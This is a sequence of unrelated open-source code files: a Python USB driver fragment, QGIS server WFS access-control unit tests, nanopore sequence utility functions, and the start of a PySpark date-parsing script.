# set the active configuration. With no arguments, the first
# configuration will be the active one
dev.set_configuration()
dev.reset()
# dev.set_configuration()
# get an endpoint instance
cfg = dev.get_active_configuration()
interface_number = cfg[(0, 0)].bInterfaceNumber
alternate_setting = usb.control.get_interface(dev, interface_number)
intf = usb.util.find_descriptor(
cfg, bInterfaceNumber=interface_number,
bAlternateSetting=alternate_setting
)
self._out = usb.util.find_descriptor(
intf,
# match the first OUT endpoint
custom_match=
lambda e:
usb.util.endpoint_direction(e.bEndpointAddress) ==
usb.util.ENDPOINT_OUT
)
_logger.debug("UBS Endpoint out: %s, %s", self._out, self._out.bEndpointAddress)
self._in = usb.util.find_descriptor(
intf,
# match the first IN endpoint
custom_match=
lambda e:
usb.util.endpoint_direction(e.bEndpointAddress) ==
usb.util.ENDPOINT_IN
)
_logger.debug("UBS Endpoint in: %s, %s", self._in, self._in.bEndpointAddress)
assert self._out is not None and self._in is not None
def close(self):
pass
def read(self):
return self._in.read(4096)
def write(self, data):
self._out.write(data)
class USB2Driver(USBDriver):
ID_VENDOR = 0x0fcf
ID_PRODUCT = 0x1008
class USB3Driver(USBDriver):
ID_VENDOR = 0x0fcf
ID_PRODUCT = 0x1009
drivers.append(USB2Driver)
drivers.append(USB3Driver)
except ImportError:
pass
def find_driver():
print("Driver available:", drivers)
for driver in reversed(drivers):
if driver.find():
print(" - Using:", driver)
return driver()
raise DriverNotFound
| mit | 2,882,284,457,482,533,400 | 30.917323 | 116 | 0.565684 | false |
uclaros/QGIS | tests/src/python/test_qgsserver_accesscontrol_wfs.py | 4 | 25549 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsServer.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Stephane Brunner'
__date__ = '28/08/2015'
__copyright__ = 'Copyright 2015, The QGIS Project'
print('CTEST_FULL_OUTPUT')
from qgis.testing import unittest
import urllib.request
import urllib.parse
import urllib.error
from test_qgsserver_accesscontrol import TestQgsServerAccessControl, XML_NS
class TestQgsServerAccessControlWFS(TestQgsServerAccessControl):
def test_wfs_getcapabilities(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetCapabilities"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<Name>Hello</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertTrue(
str(response).find("<Name>Hello_OnOff</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertTrue(
str(response).find("<Name>Country</Name>") != -1,
"No Country layer in WFS/GetCapabilities\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<Name>Hello</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertFalse(
str(response).find("<Name>Country</Name>") != -1,
"Unexpected Country layer in WFS/GetCapabilities\n%s" % response)
def test_wfs_describefeaturetype_hello(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "DescribeFeatureType",
"TYPENAME": "Hello"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find('name="Hello"') != -1,
"No Hello layer in DescribeFeatureType\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find('name="Hello"') != -1,
"No Hello layer in DescribeFeatureType\n%s" % response)
def test_wfs_describefeaturetype_country(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "DescribeFeatureType",
"TYPENAME": "Country"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find('name="Country"') != -1,
"No Country layer in DescribeFeatureType\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find('name="Country"') != -1,
"Unexpected Country layer in DescribeFeatureType\n%s" % response)
def test_wfs_getfeature_hello(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"No color in result of GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"Unexpected color in result of GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>NULL</qgs:color>") != -1, # spellok
"Unexpected color NULL in result of GetFeature\n%s" % response)
def test_wfs_getfeature_hello2(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>2</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_filter(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Filter" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_filter2(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Filter" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>6</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_country(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_OnOff" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response) # spellok
# # Subset String # #
def test_wfs_getfeature_subsetstring(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
def test_wfs_getfeature_subsetstring2(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>2</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_project_subsetstring(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks that a feature which should be available is retrieved both with and without access control
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>7</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be one result
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Feature with pkuid=7 not found in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Feature with pkuid=7 not found in GetFeature, has been incorrectly filtered out by access controls\n%s" % response)
def test_wfs_getfeature_project_subsetstring2(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks for a feature which should be filtered out by access controls
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>8</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be one result
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>8</qgs:pk>") != -1,
"Feature with pkuid=8 not found in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Feature with pkuid=8 was found in GetFeature, but should have been filtered out by access controls\n%s" % response)
def test_wfs_getfeature_project_subsetstring3(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks for features which should be filtered out by the project subsetString.
For example, pkuid 6 passes the access control checks, but should not be shown because of project layer subsetString
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>6</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be no results, since pkuid 6 is filtered out by the project layer subsetString "pkuid in (7,8)"
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") == -1,
"Project based layer subsetString not respected in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Project based layer subsetString not respected in GetFeature with restricted access\n%s" % response)
def test_wfs_getfeature_exp_filter_hello(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello",
"EXP_FILTER": "pkuid = 1"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"No color in result of GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"Unexpected color in result of GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>NULL</qgs:color>") != -1, # spellok
"Unexpected color NULL in result of GetFeature\n%s" % response)
def test_wfs_getfeature_exp_filter_hello2(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello",
"EXP_FILTER": "pkuid = 2"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_exp_filter_hello_filter(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello_Filter",
"EXP_FILTER": "pkuid = 1"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_exp_filter_hello_filter2(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello_Filter",
"EXP_FILTER": "pkuid = 6"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_featureid_hello(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello",
"FEATUREID": "Hello.1"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"No color in result of GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"Unexpected color in result of GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>NULL</qgs:color>") != -1, # spellok
"Unexpected color NULL in result of GetFeature\n%s" % response)
def test_wfs_getfeature_featureid_hello2(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello",
"FEATUREID": "Hello.2"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_featureid_hello_filter(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello_Filter",
"FEATUREID": "Hello_Filter.1"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_featureid_hello_filter2(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetFeature",
"TYPENAME": "Hello_Filter",
"FEATUREID": "Hello_Filter.6"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<qgs:pk>6</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
if __name__ == "__main__":
unittest.main()
| gpl-2.0 | 4,745,902,798,118,145,000 | 44.786738 | 128 | 0.574504 | false |
UCSC-nanopore-cgl/nanopore-RNN | nanotensor/signalAlign-utils.py | 1 | 7219 | #!/usr/bin/env python
"""
This is a place for small scripts and utility functions
"""
########################################################################
# File: utils.py
# executable: utils.py
# Purpose: maintain some simple functions as needed
# make sure all events are represented in the output from signalAlign
# stderr: errors and status
# stdout:
#
# Author: Rojin Safavi
# History: 06/01/2017 Created
from __future__ import print_function
import sys
from timeit import default_timer as timer
import glob
import random
import re
import numpy as np
from Bio.Seq import Seq
from utils import get_project_file, project_folder
from pandas import DataFrame
# from Bio.Alphabet import generic_dna
def get_refrence_and_edit(referencePath, reference_Modified_Path):
"""Get fast5 file and remove \n from the ends"""
with open(reference_Modified_Path, 'w') as outfile, open(referencePath, 'r') as infile:
for line in infile:
if ">" in line:
outfile.write(line)
else:
T = line.rstrip()
outfile.write(T)
def get_motif_complement(motif):
"""get the complement of a motif, cuurrently works with A,T,C,G,E,X,O
ex: the complement of ATCO is TAGO"""
dna = Seq(motif)
motif_complement = str(dna.complement())
return motif_complement
def get_motif_REVcomplement(motif):
"""get the complement of a motif, cuurrently works with A,T,C,G,E,X,O
ex: the REVcomplement of ATCO is OGAT"""
dna = Seq(motif)
rev_complement = str(dna.reverse_complement())
return rev_complement
def store_seq_and_name(reference_modified_Path):
"""Return the record name and concatenated sequence read from a fasta reference"""
sequence_list = ""
seq_name = ""
with open(reference_modified_Path, 'r') as infile:
for line in infile:
if ">" in line:
seq_name = seq_name + line.rsplit()[0].split(">")[1]
else:
sequence_list = sequence_list + line
return seq_name, sequence_list
def replace_nucleotide(motif, replacement):
"""compares motifs and modifed motif and
tells you what nucleotide is modified
ex: ("CCAGG","CFAGG") => C"""
pos = [i for i in range(len(motif)) if motif[i] != replacement[i]][0]
old_char = motif[pos]
new_char = replacement[pos]
rev_comp_pos = len(motif)-pos-1
return pos, old_char, new_char, rev_comp_pos
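# Illustrative only (not part of the original module): a worked example of the
# helper above, using the same "CCAGG" vs "CFAGG" case as the docstring.
def _replace_nucleotide_example():
    # position 1 differs, 'C' is replaced by 'F'; rev-comp position is 5 - 1 - 1 = 3
    assert replace_nucleotide("CCAGG", "CFAGG") == (1, "C", "F", 3)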
def nuc_position(seq_str, char):
"""Finds all positions of specific character
withing sequence"""
motif_position = [m.start() for m in re.finditer(char, seq_str)]
return motif_position
def make_bed_file(ref_modified_path, bed_path, *args):
""" NOTE: USE "F" CHAR TO DISTINGUISH MODIFIED POSITION WITHIN MOTIF
NOTE: CHAR can be E or X
ex: args = [("CCAGG","CFAGG"), ("CCTGG","CFTGG")]"""
seq_name, reference = store_seq_and_name(ref_modified_path)
with open(bed_path, "w") as outfile:
for pair in args:
motif = pair[0]
modified = pair[1]
# get pos, old character and the replacement character
pos, old_char, new_char, rev_comp_pos = replace_nucleotide(motif, modified)
# get get rev_complement of motif and modified
motif_comp = get_motif_REVcomplement(motif)
# changed from rev complement to expand the alphabet and not constrain
# replacements to a single character; it can differ across motifs
modified_comp = motif_comp[:rev_comp_pos] + new_char + \
motif_comp[rev_comp_pos+1:]
seq_str_fwd = reference.replace(motif, modified)
seq_str_bwd = reference.replace(motif_comp, modified_comp)
nuc_positions = nuc_position(seq_str_fwd, new_char)
for pos in nuc_positions:
outfile.write(seq_name + "\t" + np.str(pos) + "\t" + "+" + "\t"
+ old_char +"\t" + new_char + "\n")
nuc_positions = nuc_position(seq_str_bwd, new_char)
for pos in nuc_positions:
outfile.write(seq_name + "\t" + np.str(pos) + "\t" + "-" + "\t"
+ old_char +"\t" + new_char + "\n")
def sorting(bed_path):
'''sort the bed file'''
df = DataFrame.from_csv(bed_path, sep='\t', header=None)
df_sorted = df.sort_values([2,1], ascending=[True,True])
return df_sorted
def save_as_tsv(bed_path, sorted_bed_path):
'''save the sorted bedfile as tsv'''
s = ''
sorted_table = sorting(bed_path) # df sorted
for i in DataFrame.to_csv(sorted_table, sep='\t'):
s = s + i
g = s.split("\n")
with open(sorted_bed_path, "w") as tsv_file:
for i in g:
if "0\t1\t2\t3\t4" not in i:
tsv_file.write(i + "\n")
## Concatenate control and experimental assignments
## ex : concatenation of non methylated and methylated assignments
def concat_assignments(assignments_path1, assignments_path2, output, op_prefix):
"""concatenates control and experimental assignments"""
read_files = glob.glob(assignments_path1 + "/*." + op_prefix) + glob.glob(assignments_path2 + "/*." + op_prefix)
with open(output, "w") as outfile:
for f in read_files:
with open(f, "rb") as infile:
outfile.write(infile.read())
## for each kmer in assignments get 50 assignments or fewer
def get_sample_assignments(concat_assign_path, output_sampled):
"""Randomly sample at most 50 assignments per kmer and write them to output_sampled"""
kmerDict = dict()
with open(concat_assign_path, "r") as infile:
for i in infile:
key = i.split("\t")[0]
value = "\t".join(i.split("\t")[1:])
if key in kmerDict:
kmerDict[key].append(value)
else:
kmerDict[key] = [value]
with open(output_sampled, "w") as outfile:
for key, value in kmerDict.iteritems():
mylist = kmerDict[key]
if len(mylist) >= 50:
rand_smpl = [mylist[i] for i in random.sample(range(len(mylist)), 50)]
for g in rand_smpl:
string = ''.join(g)
outfile.write(key + "\t" + string)
elif len(mylist) < 50:
rand_smpl = [mylist[i] for i in random.sample(range(len(mylist)), len(mylist))]
for g in rand_smpl:
string = ''.join(g)
outfile.write(key + "\t" + string)
def main():
"""Test the methods"""
start = timer()
ref_seq = get_project_file("/testing/reference-sequences/ecoli_k12_mg1655.fa")
reference_modified_path = project_folder()+"/testing/reference-sequences/ecoli_k12_mg1655_modified.fa"
get_refrence_and_edit(ref_seq, reference_modified_path)
bed_file_path = project_folder()+"/testing/reference-sequences/CCAGG_modified2.bed"
sorted_bed_file_path = project_folder()+"/testing/reference-sequences/CCAGG_modified2_sorted.bed"
char = "E"
make_bed_file(reference_modified_path, bed_file_path, ["CCTGG","CETGG"], ["CCAGG","CEAGG"])
save_as_tsv(bed_file_path, sorted_bed_file_path)
stop = timer()
print("Running Time = {} seconds".format(stop-start), file=sys.stderr)
if __name__ == "__main__":
main()
raise SystemExit
| mit | -4,013,240,917,253,713,400 | 38.021622 | 116 | 0.598836 | false |
leedtan/SparklesSunshinePuppies | kycd_y_m_d_mapreduce.py | 1 | 5916 | #!/usr/bin/env python
'''
pyspark --packages com.databricks:spark-csv_2.11:1.5.0 --executor-memory 4g
'''
from pyspark import SparkContext
import os
from datetime import datetime
from datetime import date
from pyspark.sql.functions import col, udf
from pyspark.sql.types import DateType
import re
from pyspark.sql.functions import unix_timestamp
from pyspark.sql.types import IntegerType
def get_year(inputs):
y, m, d = str(inputs).split('-')
return int(y)
def get_month(inputs):
y, m, d = str(inputs).split('-')
return int(m)
def get_day(inputs):
y, m, d = str(inputs).split('-')
day = date(int(y), int(m), int(d)).isoweekday()
return day
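# Illustrative only (the date below is an arbitrary example, not from the dataset):
# how the three helpers above behave on an ISO "YYYY-MM-DD" string.
def _date_helper_examples():
    assert get_year("2015-07-04") == 2015
    assert get_month("2015-07-04") == 7
    assert get_day("2015-07-04") == 6  # isoweekday: Monday=1 ... Saturday=6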
##############################################################################
def is_date_lv(string):
if re.findall('\s*(([0]\d)|([1][0-2]))/([0-2]\d|[3][0-1])/(\d\d\d\d)', string):
return True
else:
return False
def is_time_lv(string):
if re.findall('(([01]\d)|(2[0-3]))\:([0-5]\d)\:([0-5]\d)', string):
return True
else:
return False
to_date_lv = udf(lambda x: datetime.strptime(x.strip(), '%m/%d/%Y') if is_date_lv(x) else datetime.strptime('01/01/1001', '%m/%d/%Y'), DateType())
